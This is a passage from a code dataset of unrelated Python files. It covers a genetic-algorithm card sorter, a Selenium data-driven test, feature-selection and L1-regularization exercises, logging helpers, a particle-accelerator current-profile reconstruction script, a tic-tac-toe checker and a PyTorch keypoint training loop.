randint(0,9)\r\n\r\n if self.chromosome[mutatedGene] == 0:\r\n self.chromosome[mutatedGene] = 1\r\n else:\r\n self.chromosome[mutatedGene] = 0\r\n\r\n self.update()\r\n\r\n def randomChromosome(self):\r\n result = []\r\n\r\n for k in range(10):\r\n result.append(randint(0,1))\r\n\r\n return result\r\n\r\n def update(self):\r\n self.fitness = self.fitnessFunction()\r\n\r\nclass Population:\r\n def __init__(self, size):\r\n self.population = []\r\n self.size = size\r\n self.generation = 1\r\n\r\n for k in range(size):\r\n organism = Organism()\r\n self.population.append(organism)\r\n\r\n def __str__(self):\r\n result = \"Generation \" + str(self.generation) + \"\\n\"\r\n\r\n for organism in self.population:\r\n result += str(organism) + \"\\n\"\r\n\r\n return result\r\n\r\n def advanceGeneration(self):\r\n bestOrganism = self.bestOrganism()\r\n print(self.generation, bestOrganism)\r\n\r\n for organism in range(self.size):\r\n newOrganism = Organism(bestOrganism.chromosome[:])\r\n newOrganism.mutate()\r\n self.population[organism] = newOrganism\r\n\r\n self.generation += 1\r\n\r\n def bestOrganism(self):\r\n result = self.population[0]\r\n\r\n for organism in self.population:\r\n if organism.fitness < result.fitness:\r\n result = organism\r\n\r\n return result\r\n\r\n def averageFitness(self):\r\n result = 0\r\n\r\n for organism in self.population:\r\n result += organism.fitness\r\n\r\n return result / size\r\n\r\ndef main():\r\n x = Population(3)\r\n contSim = True\r\n\r\n while(contSim):\r\n if x.bestOrganism().fitness == 0:\r\n contSim = False\r\n print(x.bestOrganism())\r\n print(x.bestOrganism().cardNotation())\r\n else:\r\n x.advanceGeneration()\r\n\r\nmain()\r\n","sub_path":"GeneticCardSort.py","file_name":"GeneticCardSort.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"232325176","text":"# Data Driven Testing to load all the quotes of Gideon to our website's data baase\n\nimport XLUtils\nfrom selenium import webdriver\n\n# For now I will not use the executable_path to access the Chrome webdriver\ndriver = webdriver.Chrome(\"E:/Madhu Chandra K/Software Testing/Test Automation/chromedriver.exe\")\ndriver.implicitly_wait(2)\ndriver.maximize_window()\n\ndriver.get(\"https://www-5d9f3c97e4fb4f546e733d76.recruit.eb7.io\")\ndriver.find_element_by_id(\"show-modal\").click()\n\npath = \"C:/Users/madhu/Desktop/e-bot7/Gideon.xlsx\" # Path of the excel file which has the Gideon quotes\n\nrows=XLUtils.getRowCount(path,'Quotes')\n\nfor r in range(2, rows+1): # As our excel data sheet has only 3 columns we need only one for loop to access the data\n author = XLUtils.readData(path, \"Quotes\", r, 1)\n quotes = XLUtils.readData(path, \"Quotes\", r, 2)\n\n driver.find_element_by_id(\"autorInput\").send_keys(author)\n driver.find_element_by_id(\"quoteInput\").send_keys(quotes)\n driver.find_element_by_xpath(\"/html/body/div/div/div/div[1]/div/div/div/div/div[3]/button[1]\").click()\n\n driver.implicitly_wait(5)\n\n if driver.title == \"e-bot7 - Sandbox\": # Since the success message after adding the quote is not displayd at the moment, I am using the title of the page for pass or fail assertion\n print(\"Test is a pass\")\n XLUtils.writeData(path, \"Quotes\", r, 3, \"Quote added successfully\") # To update the test result in the 3rd column in the same excel of the test is a pass\n else:\n print(\"Test is a fail\")\n XLUtils.writeData(path, \"Quotes\", r, 3, \"Quote not added\") # To update the test result in the 3rd column in the same excel if the test is a fail\n\n driver.find_element_by_id(\"show-modal\").click() # This is to add the next quote\n\ndriver.close()\ndriver.quit()\nprint(\"Test completed\")","sub_path":"DDT/DataDrivenTestCase.py","file_name":"DataDrivenTestCase.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"446507239","text":"# %load q03_rf_rfe/build.py\n# Default imports\nimport pandas as pd\nfrom collections import OrderedDict\n\ndata = pd.read_csv('data/house_prices_multivariate.csv')\n\nfrom sklearn.feature_selection import RFE\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n# Your solution code here\ndef rf_rfe(data):\n X = data.iloc[:,:-1]\n y = data.iloc[:,-1]\n names = data.columns\n rfc = RandomForestClassifier()\n i = int(len(X.columns)/2)\n rfe = RFE(rfc,n_features_to_select= i ,step=1)\n rfe.fit(X,y)\n d = OrderedDict(zip(names,rfe.ranking_))\n top_features = []\n for k,v in d.items():\n if v == 1:\n top_features.append(k)\n return top_features\n\n\n","sub_path":"q03_rf_rfe/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"79287321","text":"import logging\nimport os.path\nimport time\n\n\"\"\"readme\n工具名称:\n 日志记录工具\n工具的功能:\n 实现日志记录到控制台或者文本\n工具的使用:\n 1、创建logger对象,此处提供两个对象的创建\n 1.1、创建默认的对象,同时打印到控制台和记录文本\n Logger = MyLogger(\"log_name\").getLogger()\n 1.2、创建控制台打印对象,不输出文本\n Logger = Console(\"log_name\").getLogger()\n 1.3、通过参数控制\n MyLogger类保留了一个参数output,可设值为:both,file,console,控制日志的输出方式\n 2、使用对象输出日志\n Logger.info(\"hello world\")\n 3、查看日志文件(如果有)\n 日志文件默认保存在工程目录下logs文件夹下\n\"\"\"\n\n\nclass MyLogger(logging.Logger):\n \"\"\"自定义logger对象,继承自logging.Logger,实现文件和控制台的输出\"\"\"\n # 首先重建一个logger对象\n __logger = None\n\n def __init__(self, name=\"logger\", output=\"both\", level=logging.DEBUG, console_level=logging.INFO, mode='a'):\n self.__logger = logging.getLogger(name)\n # 设置logger的等级\n super().__init__(name)\n # 等级的设定既可以直接设置大写的英文,也可以设置为logging模块的内置属性,python会自动进行转换判断\n # 这里设置的是全局的level,后面可根据输出到文件和控制台设置相应的level\n # 注意这各会设置最低的等级,后续的设置只能比这个高\n self.__logger.setLevel(level)\n formatter = logging.Formatter(\"%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s\")\n\n if output in (\"both\", \"file\"):\n # 组织一个带时间戳的字符串作为日志文件的名字,实现每天记录一个日志文件\n date_time = time.strftime(\"%Y%m%d\", time.localtime(time.time()))\n log_path_str = os.path.join(os.path.abspath(os.path.join(os.getcwd(), \"\")), \"logs\")\n # python 在创建fileHandler时路径不存在会报FileNotFoundError,这里要新建下路径(而具体文件存不存在都时可以的,python会自动创建文件)\n if not os.path.exists(log_path_str):\n os.makedirs(log_path_str)\n\n log_name = os.path.join(log_path_str, date_time + '.log')\n # 创建一个logging输出到文件的handler并设置等级和输出格式\n # mode属性用于控制写文件的模式,w模式每次程序运行都会覆盖之前的logger,而默认的是a则每次在文件末尾追加\n fh = logging.FileHandler(log_name, mode)\n fh.setLevel(level)\n fh.setFormatter(formatter)\n # 给logger对象添加handler\n self.__logger.addHandler(fh)\n fh.close()\n if output in (\"both\", \"console\"):\n # 如果需要同时输出到控制台\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n ch.setLevel(console_level)\n self.__logger.addHandler(ch)\n ch.close()\n\n def getLogger(self):\n return self.__logger\n\n @property\n def name(self):\n return self.__logger.name\n\n @name.setter\n def name(self, name):\n self.__logger.name = name\n\n\nclass ConsoleLogger(MyLogger):\n def __init__(self, name=\"logger\", level=logging.DEBUG):\n super().__init__(name=name, level=level, output=\"console\")\n","sub_path":"util/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"88462025","text":"import copy\nimport numpy as np\nimport argparse\nfrom scipy.constants import c\nfrom socket import gethostname\n\nimport lasing\nimport analysis\nimport tracking\nimport config\nimport streaker_calibration\nimport image_and_profile as iap\nimport myplotstyle as ms\nimport elegant_matrix\n\nnp.random.seed(0)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--noshow', action='store_true')\nparser.add_argument('--save', type=str)\nparser.add_argument('--recon-gap', action='store_true')\nargs = parser.parse_args()\n\nms.closeall()\n\nconfig.fontsize=9\n\ncharge = 180e-12\n\ntitle_fs = config.fontsize\nms.set_fontsizes(title_fs)\niap.absolute_ScreenProfile = True\n\nelegant_matrix.set_tmp_dir('~/tmp_elegant/')\n\n\nhostname = gethostname()\nif hostname == 'desktop':\n data_dir2 = '/storage/data_2021-05-19/'\nelif hostname == 'pc11292.psi.ch':\n data_dir2 = '/sf/data/measurements/2021/05/19/'\nelif hostname == 'pubuntu':\n data_dir2 = '/mnt/data/data_2021-05-19/'\ndata_dir1 = data_dir2.replace('19', '18')\n\nblmeas_file = data_dir1+'119325494_bunch_length_meas.h5'\n\nn_streaker = 1\nplot_gap_recon = True\n\nif plot_gap_recon:\n recon_gap = True\n\ngauss_kwargs = config.get_default_gauss_recon_settings()\ngauss_kwargs['charge'] = charge\ntracker_kwargs = config.get_default_tracker_settings()\n\nblmeas_file = data_dir1+'119325494_bunch_length_meas.h5'\nblmeas_profile = iap.profile_from_blmeas(blmeas_file, gauss_kwargs['tt_halfrange'], gauss_kwargs['charge'], 0, True)\nblmeas_profile.cutoff2(0.03)\nblmeas_profile.crop()\nblmeas_profile.reshape(1000)\n\nsc = streaker_calibration.StreakerCalibration('Aramis', 1, 10e-3, charge)\nfor scf in (data_dir1+'2021_05_18-23_07_20_Calibration_SARUN18-UDCP020.h5', data_dir1+'2021_05_18-23_32_12_Calibration_SARUN18-UDCP020.h5'):\n sc.add_file(scf)\n\nsc.fit_type('centroid')\n\ntracker_kwargs = config.get_default_tracker_settings()\nrecon_kwargs = config.get_default_gauss_recon_settings()\nrecon_kwargs['charge'] = charge\ntracker = tracking.Tracker(**tracker_kwargs)\ntracker.set_simulator(sc.meta_data)\n\noffset_dict = sc.fit_type('centroid')\nstreaker_offset = offset_dict['streaker_offset']\nindex = -1\nmeas_screen = sc.get_meas_screens()[index]\nmeas_screen.cutoff2(tracker.screen_cutoff)\nmeas_screen.crop()\nmeas_screen.reshape(tracker.len_screen)\n\n\nif recon_gap:\n gap_arr = np.array([10e-3-100e-6, 10e-3+0e-6])\n use_offsets = [0, 1, 2, 3, 12, 13, 14, 15]\n gap_recon_dict = sc.gap_reconstruction2(gap_arr, tracker, recon_kwargs, streaker_offset, gap0=10e-3, use_offsets=use_offsets)\n print('assumed_bunch_duration %.2f' % (gap_recon_dict['beamsize']*1e15))\n print('assumed_bunch_uncertainty %.2f' % (gap_recon_dict['beamsize_rms']*1e15))\n delta_gap = gap_recon_dict['gap'] - 10e-3\n\n gap_arr = gap_recon_dict['gap_arr']\n beamsize_arr = gap_recon_dict['all_rms'].mean(axis=1)\n beamsize_plus = gap_recon_dict['beamsize'] + gap_recon_dict['beamsize_rms']\n beamsize_minus = gap_recon_dict['beamsize'] - gap_recon_dict['beamsize_rms']\n sort = np.argsort(gap_arr)\n gap_plus = np.interp(beamsize_plus, beamsize_arr[sort], gap_arr[sort])\n gap_minus = np.interp(beamsize_minus, beamsize_arr[sort], gap_arr[sort])\n print('Gap plus / minus, %.2f, %.2f' % (gap_plus*1e6, gap_minus*1e6))\n\n\nelse:\n delta_gap = -63e-6\nprint('Delta gap %i um' % (delta_gap*1e6))\n\n\ntracker_kwargs = config.get_default_tracker_settings()\nrecon_kwargs = config.get_default_gauss_recon_settings()\ntracker = tracking.Tracker(**tracker_kwargs)\ntracker.set_simulator(sc.meta_data)\n\nrecon_kwargs['gaps'] = [10e-3, 10e-3+delta_gap]\nrecon_kwargs['beam_offsets'] = [0., -(sc.offsets[index] - streaker_offset)]\nrecon_kwargs['n_streaker'] = 1\nrecon_kwargs['meas_screen'] = meas_screen\nrecon_kwargs['charge'] = charge\n\n\nhspace, wspace = 0.40, 0.35\nfig = ms.figure('Current profile reconstruction', figsize=(13, 6))\nms.plt.subplots_adjust(hspace=hspace, wspace=wspace)\nsubplot = ms.subplot_factory(2, 4, grid=False)\nsp_ctr = 1\n\n\nwhere0 = np.argwhere(sc.offsets == 0).squeeze()\nxlim = -3e-3, 1e-3\nylim = 1e-3, 5e-3\nfor img_index, title in [(index, '(b) Streaked'), (where0, '(a) Unstreaked')][::-1]:\n raw_image = sc.plot_list_image[img_index]\n\n x_axis = sc.plot_list_x[img_index]\n y_axis = sc.y_axis_list[img_index]\n\n img = iap.Image(raw_image, x_axis, y_axis)\n sp_img = subplot(sp_ctr, title=title, xlabel='x (mm)', ylabel='y (mm)', title_fs=title_fs)\n sp_ctr += 1\n img.plot_img_and_proj(sp_img, xlim=xlim, ylim=ylim, plot_gauss=False)\n sumx = raw_image.sum(axis=0)\n prof = iap.AnyProfile(x_axis, sumx-np.min(sumx))\n prof.cutoff2(3e-2)\n prof.crop()\n prof.reshape(5e3)\n x_rms = prof.rms()\n x_gf = prof.gaussfit.sigma\n distance = sc.gap0/2. - abs(sc.offsets[img_index])\n print('%s RMS: %i um; Gauss sigma: %i um, d=%i um' % (title, round(x_rms*1e6), round(x_gf*1e6), round(distance*1e6)))\n if img_index == where0:\n unstreaked_beamsize = x_gf\n\nsp_profile, sp_screen = [subplot(x+3, grid=False) for x in range(2)]\nsp_opt = sp_moments = sp_dummy = lasing.dummy_plot()\nsp_ctr += 2\n\nfor sp, title, xlabel, ylabel in [\n (sp_profile, '(c) Profile reconstruction', 't (fs)', 'I (kA)'),\n (sp_screen, '(d) Screen reconstruction', 'x (mm)', config.rho_label),\n #(sp_opt, 'Optimization', 'Gaussian $\\sigma$ (fs)', 'Opt value'),\n #(sp_moments, 'Transverse moments', 'Gaussian $\\sigma$ (fs)', r'$\\left|\\langle x \\rangle\\right|$, $\\sqrt{\\langle x^2\\rangle}$ (mm)'),\n ]:\n sp.clear()\n sp.set_title(title, fontsize=title_fs)\n sp.set_xlabel(xlabel)\n sp.set_ylabel(ylabel)\n\nplot_handles = sp_screen, sp_profile, sp_opt, sp_moments\n\ntracker.gauss_prec=1e-15\n\noutp = analysis.current_profile_rec_gauss(tracker, recon_kwargs, do_plot=False)\nanalysis.plot_rec_gauss(outp, plot_handles, [blmeas_profile], both_zero_crossings=False, skip_indices=(2,))\ntracker.gauss_prec=0.5e-15\n\n#sp_screen.get_legend().remove()\n#sp_profile.get_legend().remove()\n\n\nsp_screen_pos = subplot(sp_ctr, title='(e) Distance scan', xlabel='x (mm)', ylabel=config.rho_label)\nsp_ctr += 1\nsp_profile_pos = subplot(sp_ctr, title='(f) Profile comparison', xlabel='t (fs)', ylabel='I (kA)')\nsp_ctr += 1\n\nplot_handles = None, (lasing.dummy_plot(), sp_screen_pos, lasing.dummy_plot(), sp_profile_pos)\nbeam_offsets, _ = sc.reconstruct_current(tracker, copy.deepcopy(recon_kwargs), force_gap=recon_kwargs['gaps'][1])\nsc.plot_reconstruction(plot_handles=plot_handles, blmeas_profile=blmeas_profile, max_distance=300e-6)\nsc.plot_reconstruction(plot_handles=None, blmeas_profile=blmeas_profile, max_distance=np.inf)\n\n#sp_screen_pos.get_legend().remove()\n#sp_profile_pos.get_legend().remove()\n\n\n\n\ngap = recon_kwargs['gaps'][1]\nbeam_offset = recon_kwargs['beam_offsets'][-1]\nstruct_length = 1\n\n\ngauss_kwargs = config.get_default_gauss_recon_settings()\ntracker_kwargs = config.get_default_tracker_settings()\nn_emittance = 300e-9\ntracker_kwargs['n_emittances'] = [n_emittance, n_emittance]\n\ntracker = tracking.Tracker(**tracker_kwargs)\n\n\n\n#blmeas_profile.plot_standard(sp_profile_pos, color='black', ls='--')\n\n#ms.figure('Resolution', figsize=(10, 8))\n#ms.plt.subplots_adjust(hspace=0.4, wspace=0.8)\n#subplot = ms.subplot_factory(2,3, grid=False)\nms.plt.figure(fig.number)\n\n#image_file = data_dir1+'2021_05_18-21_02_13_Lasing_False_SARBD02-DSCR050.h5'\n#image_dict = h5_storage.loadH5Recursive(image_file)\n#meta_data1 = image_dict['meta_data_begin']\n\n#images = image_dict['pyscan_result']['image'].astype(float)\n#x_axis = image_dict['pyscan_result']['x_axis_m'] - screen_x0\n#y_axis = image_dict['pyscan_result']['y_axis_m']\n#projx = images.sum(axis=-2)\n#median_index = misc.get_median(projx, method='mean', output='index')\n#raw_image1 = images[median_index]\n#raw_image1 -= np.median(raw_image1)\n#image1 = iap.Image(raw_image1, x_axis, y_axis)\n\n\n#strong_streaking_file = data_dir1+'2021_05_18-23_43_39_Lasing_False_SARBD02-DSCR050.h5'\n#strong_streaking_dict = h5_storage.loadH5Recursive(strong_streaking_file)\n#meta_data2 = strong_streaking_dict['meta_data_begin']\n#\n#strong_calib_file = data_dir1+'2021_05_18-23_32_12_Calibration_SARUN18-UDCP020.h5'\n#strong_calib_dict = h5_storage.loadH5Recursive(strong_calib_file)\n#screen_x0 = strong_calib_dict['meta_data']['screen_x0']\n#index = np.argwhere(strong_calib_dict['meta_data']['offsets'] == 0)\n#raw_image = ((strong_calib_dict['raw_data']['pyscan_result']['image'])[index,0]).astype(float).squeeze()\n#raw_image2 = ((strong_calib_dict['raw_data']['pyscan_result']['image'])[0,0]).astype(float).squeeze()\n#x_axis = strong_calib_dict['raw_data']['pyscan_result']['x_axis_m'] - screen_x0\n#y_axis = strong_calib_dict['raw_data']['pyscan_result']['y_axis_m']\n#calib_image2 = iap.Image(raw_image, x_axis, y_axis)\n#image2 = iap.Image(raw_image2, x_axis, y_axis)\n\n\n\nmeta_data = sc.meta_data\ntracker.set_simulator(meta_data)\nblmeas_profile.energy_eV = tracker.energy_eV\ntracker.override_quad_beamsize = False\n#tracker.n_emittances = [200e-9, 200e-9]\n\nif plot_gap_recon:\n sp_gap = subplot(sp_ctr, title='(g) Gap reconstruction', xlabel='$\\Delta$ d ($\\mu$m)', ylabel='rms bunch duration (fs)', title_fs=title_fs)\n sp_profile1 = sp_dummy\nelse:\n sp_gap = subplot(sp_ctr, title='(g) Profile and wake', xlabel='t (fs)', ylabel='Wake (MV/m)', title_fs=title_fs)\n sp_profile1 = sp_gap.twinx()\nsp_ctr += 1\n\nsp_res = subplot(sp_ctr, title='(h) Resolution', xlabel='t (fs)', ylabel='R (fs)', title_fs=title_fs)\nsp_ctr += 1\nsp_profile = sp_res.twinx()\n\n\nblmeas_profile.plot_standard(sp_profile1, color='black', ls='--')\nblmeas_profile.plot_standard(sp_profile, color='black', ls='--', label='I(t)')\n\nsp_profile1.set_yticklabels([])\nsp_profile1.set_yticks([])\nsp_profile.set_yticks([])\n\nfor ctr, (distance, color_ctr) in enumerate([(231e-6, 2), (294e-6, 0)]):\n beam_offset = gap/2. - distance\n wake_dict = blmeas_profile.calc_wake(gap, beam_offset, struct_length)\n wake_t = wake_dict['input']['charge_xx']/c + blmeas_profile.time.min()\n wake_E = wake_dict['dipole']['wake_potential']\n if not plot_gap_recon:\n color = sp_gap.plot(wake_t*1e15, np.abs(wake_E)/1e6, label='%i' % (distance*1e6))[0].get_color()\n else:\n color = ms.plt.rcParams['axes.prop_cycle'].by_key()['color'][color_ctr]\n\n tracker.n_particles = int(200e3)\n emittances = [tracker.fit_emittance(unstreaked_beamsize, 20e-6, 200e-15), 200e-9]\n emittances = [200e-9]\n print('Emittance X set to %i nm' % (tracker.n_emittances[0]*1e9))\n res_dicts = []\n for emit_ctr, n_emittance in enumerate(emittances):\n for q_ctr, quad_wake in enumerate([True, False]):\n ls = [None, 'dotted'][q_ctr]\n tracker.n_emittances[0] = n_emittance\n tracker.quad_wake = quad_wake\n res_dict = iap.calc_resolution(blmeas_profile, gap, beam_offset, struct_length, tracker, 1)\n res = res_dict['resolution']\n res_t = res_dict['time']\n\n if q_ctr == 0:\n label = '%i' % (round(distance*1e6))\n else:\n label = None\n mask = res<10e-15\n sp_res.plot(res_t[mask]*1e15, res[mask]*1e15, label=label, color=color, ls=ls)\n res_dicts.append(res_dict)\n\nsp_res.set_ylim(0, 10)\n#sp_res.legend(title='d ($\\mu$m)', loc='upper right')\nms.comb_legend(sp_res, sp_profile, title='d ($\\mu$m)', loc='upper right')\n\nif recon_gap:\n if plot_gap_recon:\n plot_handles = (sp_gap, sp_dummy, sp_dummy, sp_dummy)\n else:\n plot_handles = None\n sc.plot_gap_reconstruction(gap_recon_dict, plot_handles=plot_handles, exclude_gap_ctrs=(2,))\n sc.plot_gap_reconstruction(gap_recon_dict)\n old_lim = sp_gap.get_xlim()\n sp_gap.set_xlim([old_lim[0], old_lim[1]+80])\n\nif not args.noshow:\n ms.show()\n\nif args.save:\n ms.saveall(args.save, hspace, wspace, ending='.pdf')\n\n","sub_path":"063f_current_recon.py","file_name":"063f_current_recon.py","file_ext":"py","file_size_in_byte":11780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"5475729","text":"# -*- coding:utf-8 -*-\n# python version= python3.X\n# code lines count about 60\nimport os\nimport logging\nimport datetime\n\n\nclass _MyLoggerMaker(object):\n \"\"\"this is a logger maker class, to use function 'create_logger' you will get a special logger\n when this logger work ,it will create the dir by the primary 'name' you send in.\n the log file name is define by date auto and the primary 'name'.\n last ,we don't support console printer. just file writer.\n \"\"\"\n\n def __init__(self):\n \"\"\" there is the config information ,after you create an object you can also change it\n by self.attribute name. And then through by function 'create_logger',you can get the\n logger you need.\n \"\"\"\n self.level = logging.INFO\n self.format = '%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s'\n self.datefmt = '%a, %d %b %Y %H:%M:%S'\n self.filemode = 'w'\n\n def _create_logger(self, name):\n \"\"\"\n this is a function to help you get a logger you need.\n :param name:\n :return:logger object\n \"\"\"\n date = datetime.date.today()\n log_dir = os.path.dirname(os.path.dirname(__file__)) + '/logs/{}'.format(name)\n if not os.path.exists(log_dir):\n os.mkdir(log_dir)\n log_path = os.path.join(log_dir, '{}:{}.log'.format(name, date))\n # print(log_path)\n # create logger handler to achieve write different log information into different log file\n handler = logging.FileHandler(log_path)\n logging.basicConfig(level=self.level,\n format=self.format,\n datefmt=self.datefmt,\n # filename=log_path,\n filemode=self.filemode)\n handler_format = logging.Formatter(fmt=self.format, datefmt=self.datefmt)\n handler.setFormatter(handler_format)\n\n logger = logging.getLogger(name)\n # add handler into logger\n logger.addHandler(handler)\n return logger\n\n\n_maker = _MyLoggerMaker()\n\nvideologger = _maker._create_logger(\"video\")\nmusiclogger = _maker._create_logger(\"music\")\nnovellogger = _maker._create_logger(\"novel\")\n\n\nif __name__ == '__main__':\n # maker = MyLoggerMaker()\n # mylogger = maker.create_logger(\"default\")\n # mylogger.info(\"xixixixxi\")\n pass\n","sub_path":"customTools/loggerHome.py","file_name":"loggerHome.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"95201290","text":"__author__ = 'KoicsD'\n\n\ndef det(num_pairs):\n return num_pairs[0][0] * num_pairs[1][1] - num_pairs[0][1] * num_pairs[1][0]\n\ndef diff(num_pair1, num_pair2):\n return (num_pair1[0] - num_pair2[0], num_pair1[1] - num_pair2[1])\n\ndef pos_vectors(num_pairs, origin):\n ret = []\n for pair in num_pairs:\n ret.append(diff(pair, origin))\n return ret\n\ndef rmv(lst, to_remove):\n ret = []\n for element in lst:\n if element != to_remove:\n ret.append(element)\n return ret\n\ndef is_winner(num_pairs):\n for pair in num_pairs:\n new_pairs = rmv(num_pairs, pair)\n positions = pos_vectors(new_pairs, pair)\n for i in range(len(positions)):\n for j in range(i):\n if det((positions[i], positions[j])) == 0:\n return True\n return False\n\ndef get_num_pairs(game_result, ch):\n ret = []\n for i in range(3):\n for j in range(3):\n if game_result[i][j] == ch:\n ret.append((i, j))\n return ret\n\ndef checkio(game_result):\n x_pairs = get_num_pairs(game_result, \"X\")\n o_pairs = get_num_pairs(game_result, \"O\")\n if is_winner(x_pairs):\n return \"X\"\n elif is_winner(o_pairs):\n return \"O\"\n else:\n return \"D\"\n\nif __name__ == '__main__':\n print(checkio([\n \"OO.\",\n \"XOX\",\n \"XOX\"]))\n\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio([\n \"X.O\",\n \"XX.\",\n \"XOO\"]) == \"X\", \"Xs wins\"\n assert checkio([\n \"OO.\",\n \"XOX\",\n \"XOX\"]) == \"O\", \"Os wins\"\n assert checkio([\n \"OOX\",\n \"XXO\",\n \"OXX\"]) == \"D\", \"Draw\"\n assert checkio([\n \"O.X\",\n \"XX.\",\n \"XOO\"]) == \"X\", \"Xs wins again\"\n","sub_path":"tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"512518685","text":"def l1_reg(model):\n \"\"\"\n Inputs: Pytorch model\n This function calculates the l1 norm of the all the tensors in the model\n \"\"\"\n l1 = 0.0\n\n for param in model.parameters():\n l1 += torch.sum(torch.abs(param))\n\n return l1\n\n# add event to airtable\natform.add_event('Coding Exercise 1.1: L1 Regularization')\n\nset_seed(seed=SEED)\n## uncomment to test\nnet = nn.Linear(20, 20)\nprint(f\"L1 norm of the model: {l1_reg(net)}\")","sub_path":"tutorials/W1D5_Regularization/solutions/W1D5_Tutorial2_Solution_f9f318de.py","file_name":"W1D5_Tutorial2_Solution_f9f318de.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"44283539","text":"conf_file = \"NeutronBrain.conf\"\ndef Del_Space(x):\n return x.rstrip(\" \").strip(\" \")\n\ndef Read_Conf(key=\"ALL\"):\n with open(conf_file, \"r\") as oke:\n oke = oke.read()\n conf = {}\n temp0 = oke.split(\"\\n\")\n #remove space and seperate \"=\" \n temp0 = list(filter(lambda x: not \"#\" in x, map(lambda x: x.rstrip(\" \").strip(\" \"), temp0))) \n for i in temp0:\n if (not \"=\" in i):\n continue\n a = i.split(\"=\")\n conf[Del_Space(a[0])] = Del_Space(a[1])\n if (key==\"ALL\"):\n return conf\n else:\n try:\n return conf[key]\n except Exception as err:\n print(err)\ndef Read_Conf_List(key=\"ALL\"):\n return list(map(lambda x: x.replace(\" \", \"\"), Read_Conf(key).split(\",\")))\n","sub_path":"NeutronBrain_Files/NeutronBrain_API/conf/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"231507028","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\nimport time\nimport copy\nfrom tqdm import tqdm\n\n\ndef rmse_score(true, pred):\n return torch.sqrt(torch.mean((true - pred) ** 2))\n\n\ndef warmup_lr_scheduler(optimizer, warmup_iters, warmup_factor):\n def f(x):\n if x >= warmup_iters:\n return 1\n alpha = float(x) / warmup_iters\n return warmup_factor * (1 - alpha) + alpha\n\n return torch.optim.lr_scheduler.LambdaLR(optimizer, f)\n\n\nWARMUP_EPOCH = 1\ndef train_one_epoch(model, opt, dataloader, loss_fn, device, epoch, max_batch_size):\n model.train()\n losses = {\"mse\": 0}\n\n lr_scheduler = None\n if epoch < WARMUP_EPOCH:\n warmup_factor = 1. / 1000\n warmup_iters = min(1000, len(dataloader) - 1)\n lr_scheduler = warmup_lr_scheduler(opt, warmup_iters, warmup_factor)\n\n for imgs, keypoints in tqdm(dataloader):\n imgs = imgs.float().to(device)[: max_batch_size]\n keypoints = torch.from_numpy(keypoints).float().to(device)[: max_batch_size]\n keypoints = torch.cat([keypoints, keypoints, keypoints])\n\n opt.zero_grad()\n pred = model(imgs)\n pred = torch.cat(pred)\n if loss_fn is not None:\n loss = loss_fn(pred, keypoints)\n else:\n loss = F.mse_loss(pred, keypoints)\n loss.backward()\n opt.step()\n\n losses[\"mse\"] += loss.item()\n\n if lr_scheduler is not None:\n lr_scheduler.step()\n losses[\"mse\"] /= len(dataloader)\n return losses\n\n\n@torch.no_grad()\ndef evaluate(model, dataloader, loss_fn, device, max_batch_size):\n model.train()\n losses = {\"mse\": 0}\n\n for imgs, keypoints in tqdm(dataloader):\n imgs = imgs.float().to(device)[: max_batch_size]\n keypoints = torch.from_numpy(keypoints).float().to(device)[: max_batch_size]\n keypoints = torch.cat([keypoints, keypoints, keypoints])\n\n pred = model(imgs)\n pred = torch.cat(pred)\n if loss_fn is not None:\n loss = loss_fn(pred, keypoints)\n else:\n loss = F.mse_loss(pred, keypoints)\n\n losses[\"mse\"] += loss.item()\n\n losses[\"mse\"] /= len(dataloader)\n return losses\n\n\nSAVE_INTERVAL = 5\ndef train_model(model, opt, scheduler, loss_fn, device, save_dir, start_epoch, end_epoch,\n train_dataloader, valid_dataloader, max_batch_size):\n since = time.time()\n best_model_wts = copy.deepcopy(model.state_dict())\n best_loss = 100.\n\n train_losses = {\"mse\": []}\n valid_losses = {\"mse\": []}\n\n #cudnn.benchmark = True\n for epoch in range(start_epoch, end_epoch + 1):\n print(\"\\n\" + \"=\" * 40)\n print(\"Epoch {}/{}\".format(epoch, end_epoch))\n\n train_loss = train_one_epoch(model, opt, train_dataloader, loss_fn, device, epoch, max_batch_size)\n print(\"\\nTrain Loss\")\n print(\"\\t mse: {:.6f}\".format(train_loss[\"mse\"]))\n for key in train_losses:\n train_losses[key].append(train_loss[key])\n\n if scheduler is not None:\n scheduler.step()\n\n valid_loss = evaluate(model, valid_dataloader, loss_fn, device, max_batch_size)\n print(\"\\nValid Loss\")\n print(\"\\t mse: {:.6f}\".format(valid_loss[\"mse\"]))\n for key in valid_losses:\n valid_losses[key].append(valid_loss[key])\n\n if valid_loss[\"mse\"] < best_loss:\n best_loss = valid_loss[\"mse\"]\n best_model_wts = copy.deepcopy(model.state_dict())\n if epoch % SAVE_INTERVAL == 0:\n torch.save(best_model_wts, save_dir)\n\n time_elapsed = time.time() - since\n print(\"\\nTraining complete in {}m 